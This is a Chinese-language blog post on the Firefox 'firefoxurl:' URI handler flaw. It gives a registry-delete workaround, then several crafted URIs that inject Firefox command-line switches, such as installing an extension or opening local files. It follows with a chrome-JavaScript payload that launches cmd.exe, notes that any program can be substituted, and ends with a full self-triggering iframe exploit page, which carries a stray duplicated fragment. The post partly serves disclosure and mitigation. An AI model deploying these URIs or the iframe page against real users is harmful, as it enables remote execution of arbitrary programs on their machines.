您现在的位置: 
Monyer公布的临时解决方法:把以下代码复制到运行框中运行、或保存为*.bat双击运行、或在cmd运行:
--------------------------------从下面开始------------------------------------
reg delete "HKEY_CLASSES_ROOT\firefoxurl" /f
--------------------------------到上面结束------------------------------------
下面我们来看看这个漏洞:
FF为了使浏览用户能够在IE中调用自己,在注册表中添加了firefoxurl启动项,当在IE中连接如下列样子时,FF即会被调用(注意以下即后面代码不要随意测试,否则可能引起拒绝服务或恶循环启动):
<a href='firefoxurl:'>monyer</a>
而FF在注册表的启动位置是这样写的:
E:\PROGRA~1\MOZILL~1\FIREFOX.EXE -url "%1" -requestPending
其中%1为传入参数,即一个连接中【firefoxurl:】后面的部分。但是聪明的你应该想到:如果你通过【test"】对语句进行结束,然后再另建FF参数和XSS值的话,便可以进行XSS了,(这个过程跟SQL注入和XSS攻击的方法类似)譬如:
firefoxurl:test|"%20-new-window%20javascript:alert('hello%20monyer');"
-new-window为firefox的命令行参数,其他的命令行参数有:
| Command | Result | Example |
|---|---|---|
| profile "<path>" | Starts Firefox with profile located at the given path. | firefox.exe -profile "E:\myprofile" |
| P "<profile name>" | Starts Firefox with a given profile name (profile name is case sensitive). | firefox.exe -P "Joel User" |
| <url> | Launches Firefox and opens the given URL(s). | firefox.exe "www.mozilla.org|www.mozillazine.org" |
| safe-mode | Launches Firefox without loading extensions or themes. | firefox.exe -safe-mode |
| no-remote | Enables Firefox to run with multiple profiles; used with -P. Firefox 2 and later. | firefox.exe -no-remote |
| height <value> | Sets height of the startup window to <value>. | firefox.exe -height 600 |
| width <value> | Sets width of the startup window to <value>. | firefox.exe -width 800 |
| ProfileManager | Starts with Profile Manager. | firefox.exe -ProfileManager |
| CreateProfile | Create a new profile | firefox -CreateProfile test |
| console | Starts Firefox with a debugging console. | firefox.exe -console |
| jsconsole | Starts with Javascript Console. | firefox.exe -jsconsole |
| inspector <url> | Starts with the DOM Inspector. | firefox.exe -inspector |
| chrome <url> | Loads the specified chrome. | firefox.exe -chrome chrome://inspector/content/inspector.xul |
| new-window <url> | Loads a URL in a new browser window. | firefox.exe -new-window <url> |
| new-tab <url> | Loads a URL in a new tab. | firefox.exe -new-tab <url> |
| install-global-extension "<path>" | Installs an extension globally. | firefox.exe -install-global-extension "C:\Temp\extension-file.xpi" |
这个是从mozilla社区摘来的。因此,你可以构造如下URI进行漏洞利用:
firefoxurl:test|"%20-CreateProfile%20Xssniper"
firefoxurl:test|"%20-new-window%20file:\\c:/monyer.txt
firefoxurl:test|"%20-console"
firefoxurl:test|"%20-jsconsole"
firefoxurl:test|"%20-safe-mode"
firefoxurl:test|"%20--install-global-extension%2520C:\Temp\monyer.xpi"
而如果我们想执行程序,可以构造如下语句:
firefoxurl:test" -chrome "javascript:C=Components.classes;I=Components.interfaces;file=C['@mozilla.org/file/local;1'].createInstance(I.nsILocalFile);file.initWithPath('C:'+String.fromCharCode(92)+String.fromCharCode(92)+'Windows'+String.fromCharCode(92)+String.fromCharCode(92)+'System32'+String.fromCharCode(92)+String.fromCharCode(92)+'cmd.exe');process=C['@mozilla.org/process/util;1'].createInstance(I.nsIProcess);process.init(file);process.run(true%252c{}%252c0);alert(process)
chrome是FF的界面选项参数,FF的界面是用XUL编写的,即上面代码中chrome后面的所有代码。个人感觉XUL里面兼容了JS的部分,由于不懂XUL,这里直接拿上面这个现成的POC给大家解释一下怎样利用漏洞运行本地程序。
上面代码的程序路径+程序名部分是:
file.initWithPath('C:'+String.fromCharCode(92)+String.fromCharCode(92)+'Windows'+String.fromCharCode(92)+String.fromCharCode(92)+'System32'+String.fromCharCode(92)+String.fromCharCode(92)+'cmd.exe');
其中92是“\”的十进制编码,这里的路径引用需要双斜杠。所以你可以把它直接替换成其他程序。
一个较完整的利用程式如下:
<html><body>
<iframe src='firefoxurl://monyer.cn" -chrome "javascript:C=Components.classes;I=Components.interfaces;file=C['@mozilla.org/file/local;1'].createInstance(I.nsILocalFile);file.initWithPath('C:'+String.fromCharCode(92)+String.fromCharCode(92)+'Windows'+String.fromCharCode(92)+String.fromCharCode(92)+'System32'+String.fromCharCode(92)+String.fromCharCode(92)+'cmd.exe');process=C['@mozilla.org/process/util;1'].createInstance(I.nsIProcess);process.init(file);process.run(true,['/k%20echo%20hello%20Monyer'],1);alert(process)'></iframe>process.init(file);process.run(true,{},0);alert(process)
</body></html>
请注意代码中的iframe是为了自动调用,alert是为了做process的单次调用,否则即是循环!
总结:
由于该漏洞的危险性巨大,所以请采用Monyer公布的解决方法,该方法会去除注册表中的firefoxurl启动项,达到免疫的目的。
